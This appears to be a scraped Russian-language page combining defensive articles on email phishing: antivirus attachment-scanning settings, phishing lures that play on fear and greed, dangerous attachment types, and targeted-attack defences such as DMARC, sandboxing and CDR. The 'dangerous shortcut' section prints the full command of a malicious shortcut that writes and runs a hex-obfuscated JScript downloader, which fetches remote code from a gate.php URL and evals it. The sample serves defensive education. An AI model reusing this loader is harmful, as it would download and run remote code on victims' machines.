Как проверить вложенный файл антифишинг
Перейти к содержимому

Как проверить вложенный файл антифишинг

  • автор:

Как проверить вложенный файл антифишинг

Чтобы настроить проверку составных файлов, вложенных в сообщения электронной почты, выполните следующие действия:

  1. Откройте окно настройки параметров программы.
  2. В левой части окна в разделе Базовая защита выберите подраздел Защита от почтовых угроз . В правой части окна отобразятся параметры компонента Защита от почтовых угроз.
  3. Нажмите на кнопку Настройка . Откроется окно Защита от почтовых угроз .
  4. Выберите закладку Общие .
  5. В блоке Проверка составных файлов выполните следующие действия:
    • Снимите флажок Проверять вложенные архивы , если вы хотите, чтобы компонент Защита от почтовых угроз не выполнял проверку вложенных в сообщения архивов.
    • Снимите флажок Проверять вложенные файлы офисных форматов , если вы хотите, чтобы компонент Защита от почтовых угроз не выполнял проверку вложенных в сообщения файлов офисных форматов.
    • Установите флажок Не проверять архивы размером более N МБ , если вы хотите, чтобы компонент Защита от почтовых угроз не проверял вложенные в сообщения архивы размером более N мегабайт. Если вы установили этот флажок, укажите максимальный размер архивов в поле рядом с названием флажка.
    • Снимите флажок Не проверять архивы более N c , если вы хотите, чтобы компонент Защита от почтовых угроз проверял вложенные в сообщения архивы, если на их проверку затрачивается более N секунд.
  6. Нажмите на кнопку OK .
  7. Нажмите на кнопку Сохранить , чтобы сохранить внесенные изменения.

Что нужно знать о фишинге

Компания Cisco заявляет, что электронная почта — источник угрозы №1 в современном мире, а по данным Verizon отправка мошеннического письма становится самым простым и популярным способом взломать любую компанию.

Получается, работать с электронной почтой небезопасно?

В статье мы расскажем, как происходят такие атаки и что делать, чтобы не стать их жертвой.

Почему электронная почта?

Чтобы добраться до корпоративных систем с ценными данными — CRM, бухгалтерии или интернет-банка — мошенникам нужно:

  1. найти и взломать внутреннюю сеть компании, которая у многих компаний хорошо защищена или вообще недоступна извне, либо
  2. взломать хотя бы одного пользователя, у которого уже есть нужные доступы.

Второй вариант — проще и эффективнее: достаточно найти адреса электронной почты нескольких сотрудников и отправить им специально подготовленные письма.

Во вложении к таким письмам будет вредоносная программа, которая заражает компьютер и дает хакеру удаленный доступ, или шифрует все данные и требует выкуп. Такая же программа ждет пользователя по ссылке в письме. Часто никаких дополнительных действий не требуется: компьютер будет заражен сразу после клика.

Таким образом, чтобы взломать компанию мошенникам приходится решить несложную задачу: сделать так, чтобы получатель письма захотел открыть вложение или перешел по ссылке.

Как это работает?

Для этого мошенники стараются вызвать сильные эмоции: это позволяет на секунду отключить критическое мышление. Секунды вполне хватит, чтобы кликнуть по ссылке или открыть вложенный файл.

Страх

Сотруднику приходит мошенническое письмо «от банка». Ключевые слова: кредит, задолженность, судебный иск:

Письмо составлено так, чтобы получатель захотел «ознакомиться с документами» и кликнул по одной или второй ссылке.

Другие примеры — письма «от контрагента», который просит погасить долг, прикладывает счет на оплату или высылает новый прайс-лист:

Источник: Антифишинг

Что сделает ваш бухгалтер, если получит такое письмо?

Страх + Авторитет

FinCERT — действующий отдел Центробанка РФ, который действительно информирует банки об инцидентах и угрозах в сфере информационной безопасности.

Хакеры организовали атаку от имени Центробанка, полностью скопировав формат электронного письма:

Во вложении — .doc-файл с макросом, который запускает вредоносную программу.

Жадность

Почему бы не получить двадцать девять тысяч рублей, ведь все что нужно для этого — перейти по ссылке:

Желание помочь или хорошо сделать свою работу

Оба следующих письма рассчитаны на то, что менеджер или сотрудник бухгалтерии захочет узнать подробности, посмотрит вложенные файлы или перейдет по ссылке:

Вместо настоящих документов в архиве может быть вредоносная программа:

Желание заработать

На зарплату сотрудника могут влиять объем продаж или количество принятых заказов. Такая мотивация сыграет на руку мошенникам:

Обе ссылки около «заявки» ведут на вредоносный файл.

Любопытство

Один из сотрудников компании RSA получил такое письмо и решил посмотреть вложенный «план набора» на 2011 год:

Файл оказался вредоносным, в результате компания была взломана, а общий ущерб составил 66 миллионов долларов США.

Как защититься?

В любой современной компании должен быть минимальный набор средств защиты: антивирусы на рабочих станциях и антиспам-фильтрация на почтовых серверах.

К сожалению, технические средства не всегда могут защитить от подобных атак. Если ссылка в мошенническом письме ведет на сайт, которого еще нет в репутационных базах, а вредоносный файл разработан профессионалами, антивирус и антиспам не помогут.

В таких условиях можно рассчитывать только на правильные действия пользователей.

Хорошо, если сотрудники знают о проблеме и умеют реагировать на фишинговые письма. Как правило, те сотрудники, которые стали жертвами реальной атаки — самые защищенные, потому что на практике убедились, что будет, если кликнуть по ссылке или открыть вложенный вредоносный файл.

Чтобы защититься, мы рекомендуем:

  • регулярно обучать всех сотрудников: показывать актуальные примеры фишинга и объяснять, чем грозит письмо от неизвестного отправителя с непонятным вложением и ссылкой.
  • проверять навыки сотрудников: как они реагируют на учебные фишинговые письма? Открывают ли вложения, переходят по ссылкам? Если ваша компания проходит ежегодный “тест на проникновение”, обязательно дополните его сценариями атак на своих пользователей.

Выводы

  1. Одного письма достаточно, чтобы взломать компьютер сотрудника и всю компанию.
  2. Не открывайте вложения и не переходите по ссылкам, в которых не уверены.
  3. Обращайте внимание на свои эмоции: страх, авторитет или ощущение срочности — признаки мошеннического письма.
  4. Перезвоните отправителю и уточните, действительно ли он выслал вам этот счет, акт или договор?
  5. Обучайте своих пользователей основам информационной безопасности. Для начала можно переслать ссылку на эту статью.
  6. Тренируйте и контролируйте практические навыки противодействия фишингу.

Опасные вложения

Опытные пользователи знают, что через почту им могут прислать вирус или троянскую программу. Мошенники, в свою очередь, стараются сделать так, чтобы вредоносные вложения выглядели как можно более безобидно.

В статье мы покажем примеры опасных вложений и объясним, на что стоит обращать внимание, чтобы не стать жертвой. Статья будет полезна пользователям и системным администраторам.

Сергей Волдохин
sv@antiphish.ru

«Традиционный» вредоносный файл

Вирус или троянскую программу пользователи обычно представляют как исполняемый файл с расширением .ехе под Виндовс или .dmg под Мак.

Такая вредоносная программа, приложенная к письму, может не определяться антивирусом, но почти все почтовые серверы умеют фильтровать подобные вложения: письмо с .ехе-файлом просто не будет отправлено. Чтобы обойти это ограничение, мошенникам бывает достаточно упаковать исполняемый файл в архив:

Что делать пользователю: получив любое вложение в архиве, распакуйте его в отдельную папку и проверьте тип вложенного файла. Не открывайте файлы типа Приложение, даже если ваш антивирус не против.

Администратору. Постарайтесь ограничить прием почты с исполняемыми файлами, даже если они упакованы в архив. При настройке ограничений стоит ориентироваться на формат файла, а не его расширение.

Вредоносный скрипт

Кроме традиционных программ, операционная система Виндоус умеет выполнять так называемые скрипты — программы, написанные на специальном языке программирования, например JScript или WBScript.

У таких языков есть ряд ограничений, но написанная на них вредоносная программа вполне способна зашифровать все файлы на диске или скачать полноценного троянца.

О существовании скриптов знает еще меньше пользователей, а мошенники стараются скрыть настоящий тип файла: например, через длинное или вызывающее доверие название:

Источник

Пользователю: Не открывайте файл, тип которого содержит слова «скрипт», «сценарий» или что-то непонятное. И даже если ваш антивирус не имеет ничего против.

Администратору: постарайтесь заблокировать исполнение скриптов, или хотя бы переопределить их обработчики. Файл .js, для которого обработчиком назначен notepad.exe — неплохая помощь антивирусу и защита для невнимательных пользователей.

Офисный документ

Пользователям бывает сложно поверить, но файлы Ворд или Эксель тоже могут быть вредоносными. Наиболее популярная схема — вредоносная программа запускается через макрос, который пользователю предлагается разрешить к выполнению под разумным предлогом. Например, если содержимое документа некорректно отображается:

Источник

Пользователю: не разрешайте выполнение макросов в документах, которые вам присылают по электронной почте. Особенно если не знаете отправителя и не уверены в содержании макроса.

Администратору: по возможности отключите исполнение макросов на компьютерах пользователей. Те, кому это действительно необходимо для работы, дадут вам знать. Вовремя обновляйте все офисные программы — кроме макросов, вредоносная программа может выполниться через эксплойт к одной из многих публичных RCE-уязвимостей.

Опасный ярлык

Иногда во вложении вовсе может не быть вредоносной программы. Вместо нее мошенники присылают ярлык, перейдя по которому пользователь сам загрузит и запустит вредоносную программу:

В свойствах этого ярлыка прописана команда, которая загрузит и запустит вредоносный .js-скрипт из интернета. Все, что нужно для загрузки и запуска, уже содержится в операционной системе.

Пользователю: ярлыки, которым вы можете доверять, находятся на вашем рабочем столе. Не стоит запускать файл с типом Ярлык, который вам прислали по электронной почте. Даже если его название вызывает доверие.

Администратору: постарайтесь заблокировать исполнение любого командного интрпретатора под учетной записью пользователя. По возможности переопределите его имя и путь — вредоносным программам будет сложнее сориентироваться. Обратите внимание на полное содержимое вредоносного ярлыка:

%windir%\system32\cmd.exe /c REM.>3.txt&echo var ty= new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");ty["\x6F\x70\x65\x6E"]("\x47\x45\x54","http://.com/src/gate.php?a");ty["\x73\x65\x6E\x64"]();eval(ty["responseText"]);>3.txt&ren 3.txt 3.js&3.js

Вредоносная ссылка

Иногда мошенники не рискуют высылать вложенный файл, а вместо этого добавляют в письмо вредоносную ссылку. Благодаря оформлению, такая ссылка выглядит похожей на «безопасный» вложенный файл:

Обе ссылки около «заявки» ведут на вредоносный файл.

Пользователю: умейте отличать вложенный файл от ссылки, которая ведет на внешний сайт. Наведите курсор и посмотрите, куда на самом деле ведет «ссылка на документ».

Администратору: постарайтесь ограничить загрузку исполняемых файлов на прокси-сервере. Аналогично вложениям, ориентируйтесь на тип файла, а не расширение.

Выводы

  1. Мошенники используют самые разные форматы вредоносных вложений.
  2. Не открывайте никакие вложения и не переходите по ссылкам, в которых не уверены.
  3. По возможности ограничьте запуск скриптов, командных интерпретаторов и загрузку небезопасных типов файлов.
  4. Обучайте своих пользователей основам информационной безопасности. Для начала можно переслать ссылку на эту статью.
  5. Тренируйте и контролируйте практические навыки противодействия фишингу.

О компании «Антифишинг»

Мы помогаем обучить сотрудников и контролируем их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и актуальные примеры мошеннических писем — в том числе те, которые описаны в статье.

Чтобы проверить своих пользователей, отправьте запрос через наш сайт или напишите нам: ask@antiphish.ru

Электронная почта как входная точка целевых атак

ВИЗИТКА

Станислав Вершинин ,
эксперт решений по защите инфраструктуры и конечных устройств, «Лаборатория Касперского»

Электронная почта
как входная точка целевых атак

Когда речь заходит об угрозах электронной почты, то первое, о чём думает специалист по информационной безопасности, – это спам и фишинг, классические угрозы, известные много лет. По данным «Лаборатории Касперского», в 2021 году [1] спамом было около 45% электронных писем, а система «Антифишинг» предотвратила более 250 миллионов попыток перехода по фишинговым ссылкам. У специалиста по информационной безопасности может возникнуть ощущение, что уж про почтовые-то угрозы он знает всё и тем более знает, как от них защищаться. «Достаточно установить антиспам-фильтр с антивирусным движком, дополнить антивирусом на рабочей станции для надёжности и можно ставить галочку, что почтовая инфраструктура защищена». Но нельзя упускать из виду то, что электронная почта используется в большом количестве целевых атак. Давайте рассмотрим этот сценарий поподробнее.

Жизненный цикл целевой атаки

Для начала разберемся, что такое целевая атака. Это вид кибератак, который направлен на компрометацию определённой системы или объекта. Обычно таргетированная атака состоит из нескольких стадий. Обнаружение такого типа угроз чрезвычайно затруднено из-за направленного характера действий злоумышленников [2] . Для понимания целевых атак необходимо разобраться, как они происходят. Существует несколько фрэймворков, описывающих классические целевые атаки. Яркий пример – это MITRE ATT&CK® [3] , являющийся де-факто стандартом в индустрии. В этой базе детально описаны техники, тактики и процедуры, используемые на разных стадиях целевой атаки. Но для общего понимания жизненного цикла атаки более удобен Cyber Kill Chain® [4] . Разведка и сбор данных (Reconnaissance) – на этом этапе происходит сбор информации о компании-цели, в основном из общедоступных источников. Выбор способа атаки (Weaponization) – на основе данных, полученных на предыдущем этапе, злоумышленник выбирает способ атаки, готовит вредоносное программное обеспечение (ПО). Это могут быть как уже имеющиеся наработки, используемые в других атаках, так и новое вредоносное ПО, эксплуатирующее уязвимости именно этой компании-цели. Доставка (Delivery) – непосредственно сам этап доставки вредоносного ПО в атакуемую организацию. Могут использоваться вредоносные флешки, атаки вида watering hole («водопой») [5] , когда злоумышленник размещает вредоносное ПО на веб-ресурсе, часто посещаемом сотрудниками атакуемой организации, и ждёт, когда вредоносное ПО попадёт на компьютер жертвы. Но основным способом доставки можно смело считать электронную почту ввиду лёгкости исполнения такой атаки и минимизации обнаружения злоумышленника. Эксплуатация (Exploitation) – эксплуатация уязвимости для получения доступа к скомпрометированному устройству. Закрепление (Installation) – на этом этапе злоумышленнику необходимо обустроить плацдарм в сети атакуемого предприятия для дальнейшего распространения атаки по сети. Исполнение команд (Command and Control) – получение команд с C&C-сервера. Используется шифрованный канал для минимизации обнаружения. Достижение цели (Actions on Objectives) – достижение непосредственной цели взлома. Например, получение доступа к конфиденциальной информации или кража денег. Электронная почта может использоваться на разных этапах жизненного цикла целевой атаки. В основном это ранние этапы, например, во время сбора данных, но, пожалуй, главный этап для использования электронной почты – это доставка вредоносного ПО.

Рисунок 1. Жизненный цикл атаки

Основные техники исполнения атаки

  • Целевой фишинг (spearphishing) – вид фишинговой атаки, направленный на конкретную организацию или сотрудника. Может содержать фишинговую ссылку или вредоносное вложение. При открытии прикреплённого файла эксплуатируется какая-либо уязвимость на системе пользователя или напрямую выполняются вредоносные инструкции. Чтобы избежать обнаружения, вложения иногда упаковываются в зашифрованный архив. Зачастую используется спуфинг адреса отправителя.
  • Whaling – подвид целевого фишинга, когда целью становится лицо, занимающее высокое положение в компании, например кто-то из директоров.
  • Business Email Compromise (BEC-атаки) – популярный в последние годы тип атаки, который сложно обнаружить. Используются техники социальной инженерии, например, злоумышленник представляется директором организации или руководителем отдела и просит сотрудника в кратчайшие сроки оплатить счёт или переслать конфиденциальные данные. Этот тип атак при успешном исполнении обычно приводит к большим финансовым потерям.

Перечисленные выше атаки зачастую содержат фишинг в том или ином виде. Так почему же может быть недостаточно установить классический антифишинг-фильтр? Дело в том, что в случае целевой атаки злоумышленник будет писать вредоносное ПО с учётом особенностей вашей инфраструктуры, информацию о которой он получил на этапе разведки. Вполне вероятно, что он будет знать, какое антивирусное ПО установлено в вашей организации. То есть записи об этом вредоносном ПО не будет в антивирусных базах. В силу очевидных архитектурных ограничений решений для защиты электронной почты они не могут проводить глубокий динамический анализ вредоносного файла без отдельной песочницы. Прежде всего, это сделано из-за соображения производительности и потребления системных ресурсов. Так какие же техники обнаружения или технологии предотвращения почтовых угроз могут нам помочь?

Рисунок 2. Принцип эшелонированной защиты

Технологии для борьбы с целевыми атаками

Классические технологии защиты электронной почты необходимы в любом случае. Имеются в виду сигнатурный, эвристический и облачный анализ как для борьбы со спамом, так и с фишингом, и с вредоносными файлами в целом. Также очень желательна система фильтрации контента или предотвращения утечек данных (DLP). А ниже перечислим некоторые техники, которые будут особенно полезны для предотвращения целевых атак с использованием почтовой инфраструктуры. Хочется подчеркнуть, что это не исчерпывающий список, но возможности, на которые стоит обратить внимание:

  • Протокол DMARC (Domain-based Message Authentication, Reporting, and Conformance)[6] . Он использует механизмы аутентификации электронной почты DKIM (DomainKeys Identified Mail) [7] и SPF (Sender Policy Framework) [8] . DMARC позволяет определить, действительно ли письмо получено от легитимного отправителя. DMARC даёт уверенность, что домен защищен от спуфинга, а получатель знает, какие действия применить к письму, которое не прошло проверку DKIM и SPF. В то же время DMARC не защищает от использования злоумышленниками похожих (lookalike) доменов. Для такого случая необходимо использовать технологии машинного обучения, которые обычно проверяют репутацию поддельных доменов и сравнивают её с репутацией известного домена. Если о репутации такого похожего домена ничего неизвестно, то с высокой долей вероятности это письмо от злоумышленника. Протокол DMARC присутствует во многих классических решениях, но весьма полезен для защиты от целевых атак.
  • Машинное обучение/ Искусственный интеллект для борьбы с BEC-атаками . Антифишинговый движок должен использовать технологии машинного обучения для обнаружения аномалий и определённых коммуникационных паттернов при анализе письма.
  • Песочница (Sandbox) . Позволяет глубоко проанализировать полученный файл или ссылку в безопасной среде. Обычно песочницы могут анализировать широкий список типов файлов, а некоторые могут позволить выбрать операционную систему, на которой должна производиться проверка. Так как некоторые вредоносные файлы для избежания обнаружения анализируют среду, в которой они запускаются, песочница должна уметь обнаруживать и такое ПО. Может поставляться как отдельный программный продукт или в составе решения для защиты от таргетированных атак, что приносит дополнительные преимущества для защиты сети организации, например за счёт анализа сетевого трафика.
  • Content Disarm and Reconstruction (CDR) . Используется для удаления из вложенных файлов активных компонентов, которые могут исполняться при открытии файла. Вложенный файл разбивается на составные части, активные элементы удаляются и файл пересобирается вновь. В отличие от других методов, CDR не полагается на обнаружение угроз, а удаляет весь исполняемый контент, благодаря чему эта техника особенно эффективна против угроз нулевого дня (zero day threats).
  • Перезапись URL и веб-изоляция (URL Rewriting & Web Isolation) . Эти методы у разных производителей могут быть реализованы по-разному, но суть их заключается в том, чтобы пользователю пришла безопасная ссылка. Например, можно заменить её на одобренный администратором текст, сделать некликабельной или перенаправить пользователя на веб-прокси, который будет отображать в браузере пользователя только безопасный контент.

Как построить безопасную систему электронной почты?

Выделим несколько базовых шагов, которые помогут вам в этом:

1. Следуйте принципу эшелонированной защиты, то есть применяйте средства:

  1. Административного контроля. Следуйте требованиям законодательства в странах ведения бизнеса (HIPAA, №152-ФЗ, GDPR и др.), используйте фреймворки и стандарты в сфере ИБ, например ISO/IEC 27000 series или специальные рекомендации NIST SP 800–45 для безопасности электронной почты, активно применяйте лучшие практики.
  2. Физического контроля, то есть обеспечьте физическую защиту вашей организации с помощью охранников, систем видеонаблюдения, заборов, замков, пропускной системы.
  3. Технического контроля, то есть аппаратные и программные средства для защиты вашей инфраструктуры.

2. Используйте решение для защиты электронной почты – желательно с одной или несколькими технологиями, указанными в предыдущем разделе.

3. Помните о том, что степень защищённости системы определяется наименее слабым звеном, то есть недостаточно использовать только решение для защиты почты. Необходимо защищать все элементы сети.

4. Используйте решения класса SIEM и XDR для получения всей информации об инцидентах ИБ в организации в одном месте и для мгновенного реагирования на угрозы на разных элементах сети предприятия (рабочих станциях, веб-, почтовых серверах).

5. Обучайте сотрудников киберграмотности. Такие курсы есть у разных поставщиков решений по ИБ. Не забывайте, что целевые атаки очень часто начинаются с методов социальной инженерии и пользователи должны проходить регулярное обучение.

Ключевые слова: фреймворк, эшелонированная защита, фишинг, вредоносный контент, антивирусные базы, электронная почта, целевая атака.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *